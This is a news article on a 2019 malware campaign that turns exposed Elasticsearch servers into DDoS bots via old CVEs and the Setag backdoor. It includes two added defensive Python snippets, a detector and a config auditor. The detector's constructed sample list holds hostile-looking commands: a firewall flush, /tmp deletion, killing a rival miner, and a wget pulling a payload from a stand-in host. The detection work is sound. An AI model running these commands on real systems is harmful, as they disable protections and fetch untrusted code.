Posted on July 2, 2019 at 12:13 PM

The new attack comprises two phases, including one where existing crypto mining malware is deleted. This is not the first time Elasticsearch databases have displayed how vulnerable they can be.

The Discovery

Trend Micro's researchers have discovered a new malware campaign targeting Elasticsearch databases. These databases store, retrieve, and manage document-oriented and semi-structured data, and they rely heavily on flexible data models to construct and update visitor profiles for the low-latency, demanding workloads that real-time engagement requires. More than 2,000 companies are currently reported to use Elasticsearch in their technology stack, including the well-known firm Uber.

The campaign takes advantage of publicly accessible or unprotected Elasticsearch databases and infects them with malware, which in turn converts them into botnet zombies used to carry out DDoS attacks.

One instance of the outbreak exploited CVE-2015-1427, an older vulnerability affecting the Elasticsearch Groovy scripting engine. Another was capable of exploiting CVE-2017-5638, a remote code execution (RCE) vulnerability in Apache Struts 2.

Researchers found that the malware used is the Setag backdoor, first discovered in 2017. Setag is equipped to steal system data and to launch various DDoS attacks.

Further investigation of the binaries revealed a backdoor variant with capabilities similar to those of the BillGates malware. BillGates came to light in 2014 and shares Setag's features, including compromising the targeted machine and then launching DDoS attacks.

The Attack

This malware attacks in two phases. In the first phase, the malware runs a script (s67.sh) that disables the firewall and specifies which shell to use. In the second phase, it runs the s66.sh script, which deletes specific files, including a range of configuration files in the /tmp directory and any cryptominers already installed by other malware.

This removed traces of the initial infection and downloaded the cybercriminals' chosen binary, all in a bid to run their own operation. The researchers noted that the attackers use expendable domains so they can swap URLs as soon as they are detected.
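The two-phase sequence just described is something a defender can look for in command execution telemetry. The following is an added example, not code from the article or from Trend Micro's report: it takes a list of executed command lines, as an EDR or auditd pipeline might record them, and flags the ordered combination of a firewall being disabled followed by /tmp clean-up, rival miners being killed and a payload download. The sample commands are constructed, and the regexes are assumptions about what such commands typically look like; only the script names s67.sh and s66.sh come from the report.

```python
# Added example (not from the article or Trend Micro's report): detection logic for the
# two-phase sequence. Sample commands are constructed; regexes are assumptions.
import re

# (phase, label, pattern). Only the script names s67.sh and s66.sh come from the report.
INDICATORS = [
    ("phase1", "firewall disabled",
     re.compile(r"\b(iptables\s+-F|ufw\s+disable|(service|systemctl)\s+(stop|disable)\s+(iptables|firewalld))\b")),
    ("phase2", "config files purged from /tmp", re.compile(r"\brm\s+-[rf]+\s+/tmp/")),
    ("phase2", "competing miner killed",
     re.compile(r"\b(pkill|killall)\b.*\b(xmrig|minerd|cryptonight)\b")),
    ("phase2", "payload downloaded", re.compile(r"\b(wget|curl)\b.*https?://")),
]


def match_indicators(commands):
    """Return (phase, label, command) for every command line that matches an indicator."""
    return [(phase, label, cmd)
            for cmd in commands
            for phase, label, rx in INDICATORS
            if rx.search(cmd)]


def is_two_phase_takeover(commands):
    """True when a phase-1 action precedes at least two distinct phase-2 actions.
    Single indicators are noisy (any admin may flush iptables or curl a URL);
    the campaign's signature is the ordered combination."""
    first_p1 = first_p2 = None
    p2_labels = set()
    for idx, cmd in enumerate(commands):
        for phase, label, rx in INDICATORS:
            if not rx.search(cmd):
                continue
            if phase == "phase1" and first_p1 is None:
                first_p1 = idx
            elif phase == "phase2":
                p2_labels.add(label)
                if first_p2 is None:
                    first_p2 = idx
    return first_p1 is not None and len(p2_labels) >= 2 and first_p1 < first_p2


# Constructed sample: a host running the two scripts, and ordinary admin activity for contrast.
SAMPLE_COMMANDS = [
    "sh /tmp/s67.sh", "iptables -F", "sh /tmp/s66.sh", "rm -rf /tmp/*.conf",
    "pkill -f xmrig", "wget -q http://compromised-site.example/payload -O /tmp/.x",
]
BENIGN_COMMANDS = ["systemctl status firewalld", "ls /tmp",
                   "curl https://repo.example/index.json"]
```

Note that the benign list still trips one indicator on its own (the download), which is why the decision is made on the ordered combination rather than any single match.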

It is worth mentioning that these criminals are using compromised websites to drop their payload. Researchers are concerned that continuing to abuse compromised websites will also help the attackers evade detection, more so than websites built by the attackers themselves would. Such capabilities in any malware are a huge "red flag."

These cybercriminals used URL encoding when the scripts are retrieved, and they compromise legitimate websites. This could mean they are simply testing their tools. It is also possible that they are readying their infrastructure before escalating to a cyberwar.

Elasticsearch's Poor History

Don't forget that Elasticsearch servers have a poor history with malware. Bob Diachenko, another security researcher, discovered over 4,000 Elasticsearch servers hosting PoS malware in September 2017. In total, Diachenko also identified more than 15,000 Elasticsearch servers that had no password or authentication protection.

Then, in November 2018, HackenProof found an IP address with a publicly accessible Elasticsearch cluster that left the personal data of about 57 million US citizens unprotected. Two months later, Security Discovery found an unprotected Elasticsearch server holding 24 million records of personal data.

More recently, in April 2019, it was reported that thousands of exposed Kibana instances made Elasticsearch databases and servers publicly accessible.

How to Defend Against the Attack

Any firm that uses Elasticsearch should be mindful of this new attack. Elasticsearch has already issued a patch for this vulnerability; apply it and prevent yourself from becoming a victim.

Security specialists can help defend against attack campaigns that seek to deliver a DDoS botnet by adopting a comprehensive vulnerability management program that prioritizes software patches according to the risk posed by known security weaknesses. Businesses should also protect against DDoS attacks using anomaly detection, next-generation firewalls, and other applicable tools.
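Patching aside, the campaign depends on nodes that are reachable from the internet, unauthenticated and scriptable. The following added example, not code from the article or from Elastic, audits an elasticsearch.yml for those three conditions. The setting names are real Elasticsearch keys (network.host, xpack.security.enabled, script.groovy.sandbox.enabled, script.inline); which of them a given version honours differs, so the audit reports only on keys that are present. The two configuration files are constructed.

```python
# Added example (not from the article or Elastic): audit an elasticsearch.yml for the
# exposure conditions this campaign relies on. Setting names are real Elasticsearch keys,
# but which version honours which key differs; the sample configs below are constructed.

LOOPBACK = {"localhost", "127.0.0.1", "::1", "_local_"}


def parse_flat_yaml(text):
    """Parse the flat 'key: value' lines of elasticsearch.yml (no nesting, no lists)."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line or ":" not in line:
            continue
        key, value = line.split(":", 1)
        settings[key.strip()] = value.strip().strip("'\"").lower()
    return settings


def audit_elasticsearch_config(text):
    """Return (setting, finding) pairs; an empty list means none of the checks fired."""
    s = parse_flat_yaml(text)
    findings = []
    host = s.get("network.host", "_local_")  # Elasticsearch binds to loopback by default
    if host not in LOOPBACK:
        findings.append(("network.host", f"node bound to {host}; reachable beyond loopback"))
    # Absent or false means no built-in authentication: anyone who can reach the port is admin.
    if s.get("xpack.security.enabled") != "true":
        findings.append(("xpack.security.enabled", "authentication not enabled"))
    # The Groovy sandbox is the surface of CVE-2015-1427 on affected 1.x releases.
    if s.get("script.groovy.sandbox.enabled") == "true":
        findings.append(("script.groovy.sandbox.enabled", "Groovy sandboxed scripting enabled"))
    if s.get("script.inline") in {"on", "true"}:
        findings.append(("script.inline", "inline dynamic scripting enabled for all requests"))
    return findings


# Constructed configs: an exposed node like those the article describes, and a corrected one.
WEAK_CONFIG = """
cluster.name: search-prod
network.host: 0.0.0.0            # listens on every interface
script.groovy.sandbox.enabled: true
script.inline: on
"""
HARDENED_CONFIG = """
cluster.name: search-prod
network.host: 127.0.0.1
xpack.security.enabled: true
script.groovy.sandbox.enabled: false
"""
```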

Summary

Article Name: Another New Malware Attack Converts Elasticsearch Databases into Botnet Zombies

Author: Ali Raza

Publisher Name: Koddos